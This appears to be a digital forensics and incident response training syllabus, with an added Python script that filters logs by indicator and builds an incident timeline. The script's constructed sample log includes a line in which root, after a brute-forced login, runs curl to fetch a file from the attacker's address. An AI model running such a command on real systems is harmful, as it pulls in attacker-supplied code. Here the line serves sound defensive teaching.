Incident Response and Investigation
1. Sensemaking
Sensemaking goes beyond analysis, a disaggregative process, and also beyond synthesis, which meaningfully integrates the factors relevant to an issue. It includes an interpretation of the results of that analysis and synthesis. It is sometimes referred to as an approach to creating situational awareness "in situations of uncertainty".
2. Crime Scene Intelligence
You may be surprised that we will discuss Forensic Entomology (the study of how insects consume decomposing human remains and provide data which can aid medical/legal investigations), but it is closer to cyber security and computer evidence collection and analysis than you think.
Becoming an investigator first and a computer expert second will give you better results than being a computer expert first. A frame of mind that looks at a case from the perspective of crime solving and time criticality is the most valuable thing you will take away from this part of the course.
3. Critical Thinking and Intelligence Analysis
This skill assists incident responders by ensuring the formulation of sound conclusions about adversarial capabilities and intentions.
Thinking, or reasoning, involves objectively connecting present beliefs with evidence in order to believe something else.
Critical Thinking is a deliberate meta-cognitive (thinking about thinking) and cognitive (thinking) act whereby a person reflects on the quality of the reasoning process simultaneously while reasoning to a conclusion. The thinker has two equally important goals: coming to a solution and improving the way she or he reasons.
4. People Investigation
There are interview techniques used by law enforcement which are also effective in corporate environments. When you need a suspect to admit to an action, you can use these techniques in much the same way.
5. Ticketing System Management
Is it bureaucratic to focus on ticketing system management for incident response first? No.
This is the foundation on which you build the whole DFIR process. Every team member must know what to focus on in the first seconds of an incident, what to record and when.
In an emergency, these skills must play on autopilot for everyone, and everyone must have the habit of meticulous record taking, as this is the only way to maintain the incident timeline and improve every step in the process during the post-incident analysis.
6. Triage
The Triage process must be understood and practiced.
The four-eyes (at least) method will guide incident responders and forensic analysts in their thoughts and actions and help them avoid human error.
The more experience someone has in cybersecurity, tech and forensics, the more they tend to become overly confident and make rookie omissions. Triage helps them stay focused on the minute details, which can turn the whole investigation around.
7. Evidence Collection
There are 12+ types of cybersecurity incidents and each requires collecting different types of evidence from various sources.
Knowing where to look is key in evidence collection, but knowing how to collect and preserve evidence is equally crucial in being able to use it during an investigation or in court.
8. OSINT
OSINT informs the decisions of analysts and investigators during the initial stages and all further stages of an investigation.
It provides valuable anchors from which to branch out to different vectors of investigation and evidence collection.
We will practice using Open Source Intelligence sources to collect information about people and technologies. Connecting both is crucial.
9. Common Terms
10. Necessary Tools and Documents
11. On-Call Preparation
12. Log Forensics
20+ GB of log files is an everyday occurrence when investigating cybercrime. Can you really find that one line to proceed with the investigation?
We will teach every student how to filter out the useless information and focus on the data points that inform our next steps in the investigation.
In the end, it will take them 20 minutes to process 20 GB of log files and find the lines that matter.
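The workflow behind "find the lines that matter" is usually two streaming passes: grep the file once for known indicators, turn the first and last hit into a padded time window, then read the file again and keep every dated line from the affected hosts inside that window, so that the context around the hits (a cron run, a sudo command) ends up on the timeline too. The script below is an added example, not course material; it assumes syslog-style lines with an ISO-8601 UTC timestamp followed by a host name, and the log lines, host names and addresses in it are constructed for illustration.

```python
import io
import re
from datetime import datetime, timedelta, timezone
from typing import Iterable, List, Optional, Tuple

# Constructed sample of syslog-style lines; not taken from any real incident.
SAMPLE_LOG = """\
2024-03-10T08:00:01Z web01 sshd[1001]: Accepted publickey for deploy from 10.0.0.5 port 51000
2024-03-10T08:02:13Z web01 sshd[1002]: Failed password for root from 203.0.113.7 port 40001
2024-03-10T08:02:14Z web01 sshd[1002]: Failed password for root from 203.0.113.7 port 40001
2024-03-10T08:02:15Z web01 sshd[1002]: Accepted password for root from 203.0.113.7 port 40001
2024-03-10T08:03:00Z web01 cron[1100]: (root) CMD (run-parts /etc/cron.hourly)
2024-03-10T08:05:40Z web01 sudo: root : TTY=pts/0 ; COMMAND=/usr/bin/curl http://203.0.113.7/x
2024-03-10T09:30:00Z web01 sshd[1200]: Accepted publickey for deploy from 10.0.0.5 port 51002
"""

Event = Tuple[datetime, str, str]  # (timestamp, host, message)
LINE_RE = re.compile(r"^(\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})Z\s+(\S+)\s+(.*)$")


def parse_line(line: str) -> Optional[Event]:
    """Split one line into (timestamp, host, message); None for lines we cannot date."""
    m = LINE_RE.match(line.rstrip("\n"))
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%S").replace(tzinfo=timezone.utc)
    return ts, m.group(2), m.group(3)


def grep_indicators(lines: Iterable[str], indicators: List[str]) -> List[Event]:
    """Pass 1: stream the file once and keep only dated lines that mention an indicator.
    Only the hits stay in memory, so the same loop works on a 20 GB file."""
    pattern = re.compile("|".join(re.escape(i) for i in indicators))
    hits = []
    for line in lines:
        if not pattern.search(line):  # cheap substring check first, parse only candidates
            continue
        ev = parse_line(line)
        if ev is not None:
            hits.append(ev)
    return hits


def context_window(hits: List[Event], minutes: int) -> Tuple[datetime, datetime]:
    """Turn the earliest and latest hit into a time window padded on both sides."""
    pad = timedelta(minutes=minutes)
    times = [ts for ts, _, _ in hits]
    return min(times) - pad, max(times) + pad


def events_in_window(lines: Iterable[str], start: datetime, end: datetime, hosts) -> List[Event]:
    """Pass 2: every dated line from the affected hosts inside the window, in time order."""
    out = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        ts, host, _ = ev
        if host in hosts and start <= ts <= end:
            out.append(ev)
    return sorted(out)


def investigate(text: str, indicators: List[str], minutes: int = 2) -> dict:
    """Indicator grep -> padded time window -> contextual timeline, in two streaming passes.
    `text` stands in for a file handle; io.StringIO gives the same line iterator."""
    hits = grep_indicators(io.StringIO(text), indicators)
    if not hits:
        return {"hits": [], "window": None, "timeline": []}
    start, end = context_window(hits, minutes)
    hosts = {host for _, host, _ in hits}
    timeline = events_in_window(io.StringIO(text), start, end, hosts)
    return {"hits": hits, "window": (start, end), "timeline": timeline}


if __name__ == "__main__":
    result = investigate(SAMPLE_LOG, ["203.0.113.7"])
    for ts, host, msg in result["timeline"]:
        print(ts.isoformat(), host, msg)
```

With the single indicator 203.0.113.7 the first pass returns four hits; the two-minute window around them then pulls in the cron line, which mentions no indicator but belongs on the timeline, while the unrelated deploy logins before and after the window stay out. On a real file, replace the io.StringIO objects with `open(path)` handles and widen `minutes` as the picture of the incident grows.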
13. Drive Forensics
The MFT and Journal files of a Windows OS are just two of many sources of valuable information.
We will learn how to quickly create and analyze drive images from various sources, how to process and extract the data we need, and even how to boot a disk image into a fully operational machine and work with it live in a Virtual Machine environment.
14. Computer Forensics Tools
15. Evidence Collection
16. Log Analysis
17. Disk Forensics
18. Memory Forensics
Sometimes the only way to get to an encrypted hard drive is through the live memory of an encrypted machine.
Memory dumps show us data that is impossible to get from a hard drive image – such as malware that lives in memory only, or encryption keys, or other volatile data that does not get recorded on disk after a reboot.
The skill to collect and analyze memory dumps is critical for any incident responder or forensic analyst.
19. Network Forensics
Wireshark is too basic for most practical purposes. We will dive into various methods of analyzing both huge amounts of traffic on an enterprise scale and small network captures from endpoints.
Students will learn to extract files from network traffic, build a timeline of events based on network traffic, extract IoCs, and other aspects of network forensics.
20. Malware Analysis
21. Malware Analysis
Static and dynamic analysis of malware are key skills even if one does not aspire to become a reverse engineer.
We will learn how to build a sandbox and analyze executable files in document and binary format.
Knowing how malware operates will give participants the knowledge of where to look for evidence and how to prevent malware from infecting corporate machines.
22. Preparing an Incident Presentation
23. Creating Incident Reports
Often underestimated, the skill to create valuable, actionable Incident Reports is a must for every Incident Responder and Forensic analyst.
We will learn how to create two types of reports: Executive and Technical ones. Both should be admissible in court.
Discounts for volume orders
— 28 February 2018
We offer discounts for high-volume orders. If you represent a law enforcement agency and want to train a larger number of people in digital forensics and incident response, contact us and we will have a special offer prepared for you.